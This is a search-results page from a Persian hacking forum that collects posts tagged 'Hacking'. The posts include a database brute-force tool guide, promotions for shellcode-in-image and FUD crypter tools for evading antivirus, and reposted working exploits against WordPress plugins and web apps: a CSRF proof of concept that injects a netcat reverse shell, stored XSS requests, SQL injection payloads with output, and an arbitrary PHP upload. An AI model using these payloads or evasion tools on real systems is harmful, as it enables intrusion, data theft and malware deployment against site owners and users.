iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

822 نتیجه پیدا شد

  1. با سلام در این تاپیک انواع شلر فیلم اماده میکنم در پنل های مختلف سرویس های مثل وردپرس جومیلا وووو اختصاصی خودتون اپلود کرده باشید فیلمش در این تاپیک قرار میدی قوانین تاپیک پست کپی کرده در تاپیک قرار نشه از اسپم سوال بی جا خوداریشود در صورت مشاهده با فرد خاصی برخورد میگردد یا حق
  2. Victory

    Hacking

    https://www.mediafire.com/file/9gu0kcdnd2l5c19/01zx.zip/file فیلم اموزشی داخل فایل قرار دارد پسورد:anonysec.org
  3. Rednofozi

    Hacking

    حملات بروت فورس یا کرک چیست؟ به زبان ساده تست لیست پسورد و یوزرنیم های زیادی بر روی تارگت مورد نظر بروت فورس میباشد تا به نتیجه و یوزرنیم و پسورد صحیح برسد معایب عیب این روش طولانی بودن زمان انتظار برای کرک میباشد داشتن سرور برای سرعت بهتر و انجام حمله شانس کم تر مزایا با نوشتن پسورد های خصوصی و قوی میتوان به نتیجه بهتر رسید شانسی برای یافتن اطلاعات ورود هست سرعت بالا ابزاری که در اخر معرفی خواهیم کرد برای چه سرویس هایی قابل استفاده است؟ این ابزار قابل استفاده در پنل های دیتابیس از نوع mySql و msSql میباشد میتوانید با استفاده از ان دیتابیس مورد نظر را مورد حمله و تست نفوذ قرار دهید بروت فورس دیتابیس بروت فورس دیتابیس نصب با دسترسی روت دستورات زیر را وارد کنید در غیر اینصورت در اول دستورات sudo اضافه کنید git clone Link chmod +x enumdb/setup.sh ./enumdb/setup.sh اجرا و مثال کرک دیتابیس MySql python3 enumdb.py -u root -p ‘password’ -t mysql 127.0.0.1 MsSql python3 enumdb.py -u ‘user’ -p password -t mysql -csv 127.0.0.1 کرک با لیست پسورد به صورت زیر python3 enumdb.py -u root -P passwd.txt -t mssql 127.0.0.1 https://github.com/m8r0wn/enumdb
  4. Rednofozi

    Hacking

    ابزار DKMC که مخفف “Dont Kill My Cat” میباشد ابزاری است برای ایجاد یک شل کد مبهم و پیچیده میباشد که درون عکس انباشته میشود بطوری که هم عکس و هم شل کد بصورت همزمان ماهیت خود را حفظ خواهند کرد به گونه ای که شک برانگیز نباشد. ایده ی ایجاد این ابزار برای فرار کردن و دوری از آنالیز های ابزار “Sand Box” که یک برنامه برای آنالیز بدافزار میباشد طرح ریزی شد لذا ابزار “DKMC” بوجود آمد. هم اکنون ابزار وابسته به “پاورشل” میباشد و تحت پاورشل قادر به ساخت شل کد و پیلود برای دسترسی گرفتن و نفوذ به سیستم قربانی کاربرد دارد… لینک گیت هاب این ابزار رو در پایین برای شما عزیزان قرار میدم امیدوارم که خوشتون بیاد : https://github.com/Mr-Un1k0d3r/dkmc
  5. توضیحات کریپتر ها میتوانند از رمزنگاری های مختلفی استفاده کنند و از هر کدام از ان ها چندین بار استفاده کنند به عنوان مثال میتوان رمزنگاری های base64 , aes, … را مثال زد ; کریپتر ها اغلب به زبان های مختلفی نوشته میشوند مانند c, vb, c++ , … که نوشتن ان ها بسته به برنامه نویس دارد که نیاز به دانش و درک بالایی از برنامه نویسی و رمزنگاری دارد نکته جالب بسیاری از فروشگاه های دارک وب و حتی اینترنت crypter های خود را برای فروش میگزارند که میتوان برای مدتی از ان ها استفاده کرد مثلا برای چند ماه تا شناسایی کرد انتی ویروس ها انواع Crypter Run time این نوع از کریپتر ها در هنگام روشن بودن انی ویروس ها هم کار خود را به درستی انجام میدهند و توسط انتی ویروس شناسایی نمیشوند Scan time و در این نو کریپتر ها فقط هنگام اسکن انتی ویروس شناسایی نمیشوند و در هنگام اجرا انتی ویروس ان را شناسایی و حذف میکند نکته همیشه به دلیل رمزنگاری کردن فایل ویروس امکان بالا رفتن حجم فایل وجود دارد معرفی crypter معروف و قدرتمند بسیاری از شما بعد از ساخت رات نیاز به crypter برای اجرا و مخفی سازی از انتی ویروس های دارید یکی از معروف ترین ان ها aegiscrypte میباشد این ابزار محبوبیت بسیاری دارد و در نسخه مدت محدود و پولی که بصورت اختصاصی است ارائه میشود که میتوانید بعد از دانلود به صورت رایگان از ان استفاده کنید برای دانلود از لینک اخر صفحه بعد از ثبت نام استفاده نمایید توضیحات Aegis Crypter قابل اجرا در تمامی نسخه های ویندوز نوشته شده به زبان c ,c++ پشتیبانی از فایل های .net مباحث پیشرفته تر Crypter دوستانی که به مباحث بیشتری در این زمینه علاقه دارند میتوانند بعد از ثبت نام از لینک اخر صفحه سورس های کریپتر های مختلف را مشاهده کنند که با زبان های مختلفی وجود دارد مناسب با زبان مورد علاقه خود را دانلود کنید و از ان ها به صورت کاملا FUD استفاده کنید FUD : به معنایی شناسایی نشدن توسط هیچ انتی ویروسی و کاملا حرفه ای و قوی https://www.sendspace.com/file/iys1qn password : 123 https://github.com/malwares/Crypter
  6. <!-- About: =========== Component: Plainview Activity Monitor (Wordpress plugin) Vulnerable version: 20161228 and possibly prior Fixed version: 20180826 CVE-ID: CVE-2018-15877 CWE-ID: CWE-78 Author: - LydA(c)ric Lefebvre (https://www.linkedin.com/in/lydericlefebvre) Timeline: =========== - 2018/08/25: Vulnerability found - 2018/08/25: CVE-ID request - 2018/08/26: Reported to developer - 2018/08/26: Fixed version - 2018/08/26: Advisory published on GitHub - 2018/08/26: Advisory sent to bugtraq mailing list Description: =========== Plainview Activity Monitor Wordpress plugin is vulnerable to OS command injection which allows an attacker to remotely execute commands on underlying system. Application passes unsafe user supplied data to ip parameter into activities_overview.php. Privileges are required in order to exploit this vulnerability, but this plugin version is also vulnerable to CSRF attack and Reflected XSS. Combined, these three vulnerabilities can lead to Remote Command Execution just with an admin click on a malicious link. References: =========== https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/ PoC: --> <html> <!-- Wordpress Plainview Activity Monitor RCE [+] Version: 20161228 and possibly prior [+] Description: Combine OS Commanding and CSRF to get reverse shell [+] Author: LydA(c)ric LEFEBVRE [+] CVE-ID: CVE-2018-15877 [+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell [+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data"> <input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" /> <input type="hidden" name="lookup" value="Lookup" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  7. # Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting # Google Dork: inurl:"/wp-content/plugins/jibu-pro" # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip # Version: 1.7 # Tested on: Kali Linux # CVE: N/A # Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: name # 1) Login as a user who have access to Jibu Pro plugin. # 2) Jibu-Pro --> Create Quiz. # 3) At the Quiz Name type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number]) # 4) Click Create New Questions, fill the fields and click Save. # 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 512 name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save
  8. # Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting # Date: 2018-08-29 # Exploit Author: Renos Nikolaou # Software Link: https://downloads.wordpress.org/plugin/quizlord.zip # Version: 2.0 # Tested on: Kali Linux # CVE: N/A # Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities # because it fails to properly sanitize user-supplied input. # PoC - Stored XSS - Parameter: title # 1) Login as a user who have access to Jibu Pro plugin. # 2) Quizlord --> Add a Quiz. # 3) At the title type: poc"><script>alert(1)</script> , then fill the remaining fields and click Save. # (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"]) # 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser. # Post Request (Step 3): POST /wordpress/wp-admin/admin.php HTTP/1.1 Host: domain.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord Cookie: wordpress_295cdc576d46a74a4105db5d33654g45 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 188 action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save
  9. # Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection # Date: 2018-09-09 # Exploit Author: Ceylan Bozogullarindan # Vendor Homepage: http://modalsurvey.pantherius.com/ # Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip # Version: 1.5.7.3 # Tested on: Windows 10 # CVE: N\A # Description # The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. # PoC # Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. # Answer that question. # Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, # and change it with the payload showed below; ["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] # It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result # of the query. When you make it 1=1, you should see a question from firt record. # Therefore OR statement must be returned False. # Step 3. Reload the page. Open the source code of the page. Search "sss_params". # You will see the version of DB in value of sss_params parameter. # The Request Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] Connection: keep-alive Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 # The result from source code of the page <script type='text/javascript'> /* <![CDATA[ */ var sss_params = {"survey_options":"{\"options\":\"[\\\"center\\\",\\\"easeInOutBack\\\",\\\"\\\",\\\"-webkit-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-moz-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-ms-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);-o-linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);linear-gradient(top , rgb(5, 40, 242) 13% , rgb(204, 204, 204) 70%);\\\",\\\"rgb(0, 0, 0)\\\",\\\"rgb(93, 93, 93)\\\",\\\"1\\\",\\\"5\\\",\\\"12\\\",\\\"10\\\",\\\"12\\\",500,\\\"Thank you for your feedback!\\\",\\\"0\\\",\\\"0\\\",\\\"0\\\"]\",\"plugin_url\":\"http:\\\/\\\/www.*****.com\\\/wp-content\\\/plugins\\\/wp-survey-and-poll\",\"admin_url\":\"http:\\\/\\\/www.******.com\\\/wp-admin\\\/admin-ajax.php\",\"survey_id\":\"1101225978\",\"style\":\"modal\",\"expired\":\"false\",\"debug\":\"true\",\"questions\":[[\"Are You A First Time Home Buyer?\",\"Yes\",\"No\"],[\>>>>>>"10.1.36-MariaDB-1~trusty\"<<<<<<<]]}"}; /* ]]> */ </script> DB version: "10.1.36-MariaDB-1~trusty"....
  10. Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Arigato Autoresponder and Newsletter v2.5 Author: Larry W. Cashdollar, @_larry0 Date: 2018-08-22 CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-1002004][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] Download Site: https://wordpress.org/plugins/bft-autoresponder/ Vendor: Kiboko Labs https://calendarscripts.info/ Vendor Notified: 2018-08-22, Fixed v2.5.1.5 Vendor Contact: @prasunsen wordpress.org Advisory: http://www.vapidlabs.com/advisory.php?v=203 Description: This plugin allows scheduling of automated autoresponder messages and newsletters, and managing a mailing list. You can add/edit/delete and import/export members. There is also a registration form which can be placed in any website or blog. You can schedule unlimited number of email messages. Messages can be sent on defined number of days after user registration, or on a fixed date. Vulnerability: These vulnerabilities require administrative priveledges to exploit. CVE-2018-1002000 There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST request. In line 69 of file controllers/list.php: 65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")"); del_ids is not sanitized properly. Nine Reflected XSS. CVE-2018-1002001 In line 22-23 of controllers/list.php: 22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob']; 23 echo "<meta http-equiv='refresh' content='0;url=$url' />"; CVE-2018-1002002 bft_list.html.php:28: <div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div> CVE-2018-1002003 bft_list.html.php:29: <div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div> CVE-2018-1002004 bft_list.html.php:42: <input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo empty($_GET['sdate']) ? '' : $_GET['sdate']?>"> CVE-2018-1002005 bft_list.html.php:43: <input type="hidden" name="filter_signup_date" value="<?php echo empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" id="alt_bftSignupDate"></div> CVE-2018-1002006 integration-contact-form.html.php:14: <p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" name="classes" value="<?php echo @$_POST['classes']?>"></p> CVE-2018-1002007 integration-contact-form.html.php:15: <p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" name="html_id" value="<?php echo @$_POST['html_id']?>"></p> CVE-2018-1002008 list-user.html.php:4: <p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo $_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p> CVE-2018-1002009 unsubscribe.html.php:3: <p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p> Exploit Code: SQL Injection CVE-2018-1002000 $ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql Where post_data is: POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1 Host: example.com Connection: keep-alive Content-Length: 150 Cache-Control: max-age=0 Origin: http://example.com Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http] (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests: --- Parameter: #1* ((custom) POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http] --- [11:50:08] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 8.0 (jessie) web application technology: Apache 2.4.10 back-end DBMS: MySQL >= 5.0.12 [11:50:08] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.47' [*] shutting down at 11:50:08 CVE-2018-1002001 http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS
  11. # Exploit Title: Vishesh Auto Index 3.1 - 'fid' SQL Injection # Dork: N/A # Date: 2018-10-15 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://www.vishesh.cf/ # Software Link: https://sourceforge.net/projects/vishesh-wap-auto-index/files/latest/download # Version: 3.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://192.168.1.27/[PATH]/file.php?fid=[SQL] -1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe GET /[PATH]/file.php?fid=-1%20UnioN%20seLECt%20112115%2c112115%2c112115%2c112115%2c112115%2c112115%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c112115%2c112115%2c112115%2c112115%2c112115%2c112115%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:12:23 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 7799 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 # POC: # 2) # http://192.168.1.27/[PATH]/download.php?fid[SQL] -1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe GET /[PATH]/download.php?fid=-1%20UnioN%20select%20ConcAT((SElecT%20GrouP_ConcAT(schema_nAME%20SEPAratoR%200x3c62723e)%20FRom%20INFORmatION_ScheMA.SchematA))%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2c999555444%2d%2d%20Efe HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=nk7b5obkruk2rtd2kbm3gamg42 Connection: keep-alive HTTP/1.1 200 OK Date: Sat, 15 Oct 2018 01:18:41 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 835 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
  12. # Exploit Title: Wordpress Plugin Support Board 1.2.3 - Cross-Site Scripting # Date: 2018-10-16 # Exploit Author: Ismail Tasdelen # Vendor Homepage: https://schiocco.com/ # Software Link : https://board.support/ # Software : Support Board - Chat And Help Desk # Version : v1.2.3 # Vulernability Type : Code Injection # Vulenrability : HTML Injection and Stored XSS # CVE : N/A # In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, # a Stored XSS vulnerability has been discovered in file upload areas in the # Chat and Help Desk sections via the msg parameter # in a /wp-admin/admin-ajax.php sb_ajax_add_message action. # HTTP POST Request : [Stored XSS] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/chat/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 450 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang= # In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, # the Stored XSS vulnerability has been discovered in the HTML Injection vulnerability and # file upload areas in the Chat and Help Desk sections of Schiocco. # HTTP POST Request : [HTML Injection] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://TARGET/desk-demo/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 288 Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77 Connection: close action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=
  13. # Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload # Dork: N/A # Date: 2018-10-25 # Exploit Author: Ihsan Sencan # Vendor Homepage: http://deltasql.sourceforge.net/ # Software Link: https://sourceforge.net/projects/deltasql/files/latest/download # Software Link: http://deltasql.sourceforge.net/deltasql/ # Version: 1.8.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # http://localhost/[PATH]/docs_manage.php?id=1 # # http://localhost/[PATH]/upload/[FILE] POST /[PATH]/docs_upload.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/[PATH]/docs_manage.php?id=1 Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0 Connection: keep-alive Content-Type: multipart/form-data; boundary= ---------------------------158943328914318561992147220435 Content-Length: 721 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php" Content-Type: application/force-download <?php phpinfo(); ?> -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="submit" Upload File -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="id" 1 -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="version" -----------------------------158943328914318561992147220435 Content-Disposition: form-data; name="hasdocs" -----------------------------158943328914318561992147220435-- HTTP/1.1 200 OK Date: Thu, 24 Oct 2018 00:24:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1783 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <html> <body> <form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data"> Select document to upload: <input name="fileToUpload" id="fileToUpload" type="file"> <input value="Ver Ayari" name="submit" type="submit"> <input value="1" name="id" type="hidden"> <input value="1'" name="version" type="hidden"> <input value="1" name="hasdocs" type="hidden"> </form> </body> </html>
